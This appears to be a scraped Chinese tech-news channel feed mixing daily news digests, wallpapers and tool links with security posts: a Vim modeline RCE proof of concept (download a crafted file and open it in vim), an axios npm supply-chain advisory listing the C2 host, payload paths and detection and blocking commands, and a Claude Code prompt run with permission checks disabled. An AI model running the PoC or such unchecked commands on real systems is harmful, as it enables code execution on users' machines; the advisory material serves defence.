随机碎片 / 资讯文档 / 网站工具 / GitHub 项目 / Bing 壁纸
vim存在rce,打开文件即可触发

https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh

poc

vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc


漏洞还是claude发现的,prompt只有一句话

Somebody told me there is an RCE 0-day when you open a file. Find it.
Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272
严重供应链攻击,axios 两个版本被投毒。

核心信息

| 项目         | 内容                                                                                              |
| ---------- | ----------------------------------------------------------------------------------------------- |
| 恶意版本       | axios@1.14.1 和 axios@0.30.4                                                                     |
| 攻击手法       | 劫持维护者 jasonsaayman 的 npm 账户,绕过 CI/CD 直接发布                                                       |
| 恶意依赖       | plain-crypto-js@4.2.1(伪装成 crypto-js,实际 drop RAT|
| C2 服务器     | sfrclak.com:8000 (IP: 142.11.206.73)                                                            |
| 平台 payload | macOS: /Library/Caches/com.apple.act.mond<br>Linux: /tmp/ld.py<br>Windows: %PROGRAMDATA%\wt.exe |

你需要做的

1. 立即检查
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 中招"
2. 如果命中
• 降级到安全版本:axios@1.14.0axios@0.30.3
系统已受陷 → 从干净状态重建,轮换所有凭证(npm token、AWS 密钥、SSH、云凭证)
• 检查 RAT 持久化文件(见上表路径)
3. CI/CD 加固
npm ci --ignore-scripts  # 禁止 postinstall 脚本
iptables -A OUTPUT -d 142.11.206.73 -j DROP  # 屏蔽 C2

axios 周下载量 3 亿+,影响范围极大。检查完你的项目和CI/CD流水线。
前两天刚在夸 Firefox,他们在更新 149 的时候同步更新了 ToS,可以卖你的各种信息,用语十分宽泛甚至可能可以卖你的浏览记录

建议:Get the fuck out of Firefox and use LibreWolf or something better

https://goblin.band/notes/ak78rax5htqlh5qo

https://discuss.privacyguides.net/t/firefox-shares-browsing-data-and-other-unique-info-with-with-partners-service-providers-suppliers-and-contractors-including-cloudflare-and-google/36524
😁 OpenAI 搞了个官方的 Claude Code 插件 codex-plugin-cc,可以方便大家在 Claude Code 中去调用 Codex。
这是深入敌后发展根据地吗,后面 A% 应该不会也对等推出在 Codex 中 调用 Claude Code 的插件吧
https://github.com/openai/codex-plugin-cc GitHub - openai/codex-plugin-cc: Use Codex from Claude Code to review code or delegate tasks.
一觉醒来发生了什么 03月31日
#Daily

2026年3月31日
🌍资讯快读
1、郑丽文回应4月访陆:这是台湾主流民意的殷殷期盼
https://www.thepaper.cn/newsDetail_forward_32861357
2、黑龙江海林建筑坍塌事故救援结束,7人遇难
https://www.jiemian.com/article/14182789.html
3、丈夫婚内赠与“第三者”财产,法院认定违背公序良俗判决返还
https://www.thepaper.cn/newsDetail_forward_32860974
4、中国将在长江水下开高铁
https://www.thepaper.cn/newsDetail_forward_32860068
5、国航中朝航线恢复运行
https://www.jiemian.com/article/14180512.html

👬即刻镇小报
1、30岁上下的人,AI最是你们的机会。
https://m.okjike.com/originalPosts/69c949dec5a1d4e6493469c0
2、我每天会监测的健康数据
https://m.okjike.com/originalPosts/69c9f5dcc9f973544e74a232
3、编程,正在变成一件几乎不需要消耗专注力的事情。
https://m.okjike.com/originalPosts/69c903f9c5a1d4e6492e16c1
4、真正有价值的反馈,不是告诉你“应该更好”,而是准确指出你“为什么现在还不够好”
https://m.okjike.com/originalPosts/69c920d79fe7bd898ae3e48b

今日即刻镇小报内容来自 @张机 @小马宋 @Barret李靖 @姜旭 ,感谢以上即友的创作与分享。
🖼 地下天堂
#Bing_Wallpaper

地下天堂

天堂洞, 峰牙 - 格邦国家公园, 越南 (© Pakawat Thongcharoen/Getty Images)

4K | 1080P
💡国行 iPhone 正式支持 Apple Intelligence

群友反馈 国行 iPhone 正式支持 Apple Intelligence,传闻离线模型似乎使用 百度 的 文心大模型 5.0(暂不确定

欢迎各位国行机用户测试并在评论区反馈。

DP1 : https://t.me/AppleNuts/2407?comment=3827181

DP2: https://t.me/AppleNuts/2407?comment=3827209

评论区很多国行设备用户反馈 Siri 已经变成 Apple Intelligence,消息属实。
#miclaw #系统输入法 #小米输入法
debug mode里可以看到 API 和模型
然后 API Key 居然是明文的…小米你在干什么,被复制粘贴拿去滥用怎么办
(已经开始被滥用了)
好吧小米不是第一次这么干了
OKHK 👀
https://fxtwitter.com/yetone/status/2038204630572962136
#Prompt 开源 😁
https://github.com/yetone/voice-input-src
Code is cheap. Show me the talk.

claude \
  --dangerously-skip-permissions \
  --output-format=stream-json \
  --verbose \
  -p "请实现一个 macOS menu-bar 语音输入法应用(Swift,macOS 14+),具体要求:

1. 按住 Fn 键录音,松开后将转录文字注入当前聚焦的输入框。优先使用流式转录(Apple Speech Recognition framework)。Fn 键通过 CGEvent tap 全局监听,需抑制 Fn 事件传递以防止触发 emoji 选择器。
2. 默认语言必须为简体中文(zh-CN),确保开箱即用就能识别中文输入。同时在菜单栏提供语言切换选项(英语、简体中文、繁体中文、日语、韩语)。语言选择存储在 UserDefaults 中。
3. 录音时在屏幕底部居中显示一个特别优雅精致的无边框胶囊状悬浮窗,不要有红绿灯和 titlebar。使用 NSPanel(nonactivatingPanel)+ NSVisualEffectView(.hudWindow 材质),高度足够(56px,圆角半径 28px),包含:
   - 左侧 5 根竖条波形动画(44×32px),必须由实时音频 RMS 电平驱动(不要用写死的假动画),说话声音大波形就大、安静时波形就小。各竖条权重为 [0.5, 0.8, 1.0, 0.75, 0.55] 形成自然的中间高两侧低效果,平滑包络(attack 40%、release 15%),每根竖条添加 ±4% 随机抖动增加有机感。波形要足够大,清晰可见。
   - 右侧文字标签(弹性宽度 160-560px)实时显示转录文本,胶囊随文字变多而弹性变宽
   - 入场弹簧动画(0.35s)、文字宽度平滑过渡(0.25s)、退场缩放动画(0.22s)
4. 文字注入使用剪贴板 + 模拟 Cmd+V 粘贴方式,注入前需检测当前输入法:如果是 CJK 输入法,先临时切换到 ASCII 输入源(ABC/US 键盘)再粘贴,粘贴完成后恢复原输入法,防止中文输入法拦截 Cmd+V。注入完成后恢复原剪贴板内容。
5. 接入 LLM 来提升语音识别的准确率,尤其是中英文混杂的情况下。通过 OpenAI 兼容 API(可配置 API Base URL、API Key、Model)对转录文本进行 refine。LLM 的 system prompt 要求非常保守地纠错:只修复明显的语音识别错误(如中文谐音错误、英文技术术语被错误转为中文如「配森」→「Python」、「杰森」→「JSON」),绝对不要改写、润色或删除任何看起来正确的内容,如果输入看起来正确则必须原样返回。
6. 在菜单栏提供 LLM Refinement 子菜单,包含启用/禁用开关和 Settings 入口。Settings 窗口包含 API Base URL、API Key、Model 三个输入框,API Key 输入框要能完全清空,以及 Test 和 Save 按钮。松开 Fn 键后如果 LLM 已启用且已配置,悬浮窗显示 Refining... 状态,等 LLM 返回后再注入最终文本。
7. 应用以 LSUIElement 模式运行(仅菜单栏图标,无 Dock 图标)。使用 Swift Package Manager 构建,提供 Makefile(build/run/install/clean),构建产物为签名的 .app bundle。"
GitHub - yetone/voice-input-src
把自己这两个月的记录 life 的 cli 小工具开源了,比较有趣的地方是它支持 iOS 快捷指令可以随时随地在手机记,支持 TUI 支持 —week, 一个 README 记录你的 life (推荐 private 仓库)
https://github.com/yihong0618/lfn
一觉醒来发生了什么 03 月 30
#Daily

2026 年 3 月 30 日
🌍 资讯快读
1、太原一高层建筑火灾已致 3 死 23 伤,其中 9 人伤势较重
https://www.thepaper.cn/newsDetail_forward_32855688
2、北京启动智能网联新能源汽车商业保险开发应用
https://www.jiemian.com/article/14179658.html
3、女子被羁押 821 天后不予起诉申请国家赔偿被叫停,当地成立联合调查组
https://www.thepaper.cn/newsDetail_forward_32856029
4、美国防部正为“在伊朗展开为期数周的地面行动”做准备
https://www.jiemian.com/article/14179055.html
5、宇树科技具身智能体验馆亚洲首店将于 5 月底落地上海
https://www.jiemian.com/article/14179385.html

👬 即刻镇小报
1、《挽救计划》观后感:每个人都需要一次 Hail Mary
https://m.okjike.com/originalPosts/69c8aae851449d16de2f2943
2、很多健康问题在睾酮水平恢复正常后都会自动消失
https://m.okjike.com/originalPosts/69c4f7172307ef907333642b
3、能超越古今中外民族语言完成人类共同情感的交互,这就是文学与音乐的意义吧
https://m.okjike.com/originalPosts/69c721af800201ac68e9a576
4、人间行路,本就无章可循
https://m.okjike.com/originalPosts/69c8a7b1844afeb86e40390f

今日即刻镇小报内容来自 @Szhans @数字游民 Jarod @漆蝶 @飞行器地执行周期 ,感谢以上即友的创作与分享。
🖼 优雅的动态
#Bing_Wallpaper

优雅的动态

蓑羽鹤, 印度 (© Axel Gomille/Nature Picture Library)

4K | 1080P
我录入了 14 亿条数据泄漏信息,搓了一个 个人信息 “泄漏” 检测工具

据公开传播的泄漏数据, 花了几天 搓了一个 个人信息 “泄漏” 检测工具。

地址: https://breach.garinasset.com/

主要特点:

1. “不记录”「查询记录」
2. “不提供”「隐私信息」


https://www.v2ex.com/t/1202064
Back to Top
OKHK